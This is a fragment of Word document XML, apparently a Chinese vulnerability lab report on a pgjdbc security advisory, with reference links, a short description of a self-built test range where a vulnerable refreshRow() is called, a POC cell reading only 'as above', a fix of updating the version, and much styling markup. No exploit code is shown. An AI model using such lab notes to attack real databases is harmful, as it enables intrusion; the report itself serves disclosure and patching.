                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>gjdbc/security/advisories/GHSA-r38f-c4h4-hqq2</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="18"/>
                    <w:spacing w:line="480" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                      <w:color w:val="000000"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>http://www.hackdig.com/08/hack-762021.htm</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>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靶场信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>靶场自行搭建，用户权限包括对test下table的建立、查看内容和插入数据，在查看table内容时ResultSet.next()后,调用了漏洞版本的refreshRow()。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>如上.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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修复方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>更新为新版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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b/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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eastAsia="等线"/>
                            </w:rPr>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P56+UsAgAAVw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g/nr5SwCAABXBAAADgAAAAAAAAABACAAAAAfAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYA&#10;BgBZAQAAvQUAAAAA&#10;">
              <v:fill on="f" focussize="0,0"/>
              <v:stroke on="f" weight="0.5pt"/>
              <v:imagedata o:title=""/>
              <o:lock v:ext="edit" aspectratio="f"/>
              <v:textbox inset="0mm,0mm,0mm,0mm" style="mso-fit-shape-to-text:t;">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:pStyle w:val="8"/>
                      <w:rPr>
                        <w:rFonts w:eastAsia="等线"/>
                      </w:rPr>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ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300">
          <wp:extent cx="899160" cy="35941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9160" cy="35941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C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA55"/>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0MTdmYTY2NGExYmRlNmIzN2E1ZTEyZDIxYTNmMDYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="45FF1385"/>
    <w:rsid w:val="4899127A"/>
    <w:rsid w:val="4B7D0C82"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="68820624"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78A85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qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="100" w:beforeLines="100" w:after="100" w:afterLines="100" w:line="400" w:lineRule="exact"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50" w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="290" w:line="372" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="黑体"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="15">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Body Text Indent 2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000"/>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qFormat/>
    <w:uiPriority w:val="39"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1680"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:r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paragraph" w:styleId="17">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="18">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:kern w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="19">
    <w:name w:val="WPSOffice手动目录 1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="WPSOffice手动目录 2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="200" w:leftChars="2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1520</Words>
  <Characters>4339</Characters>
  <Lines>12</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>54</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4756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2021-07-06T05:38:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>微信用户</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-20T09:32:15Z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A68A5576C0F547359BCE6A8FA65B1EA9_13</vt:lpwstr>
  </property>
</Properties>
</file>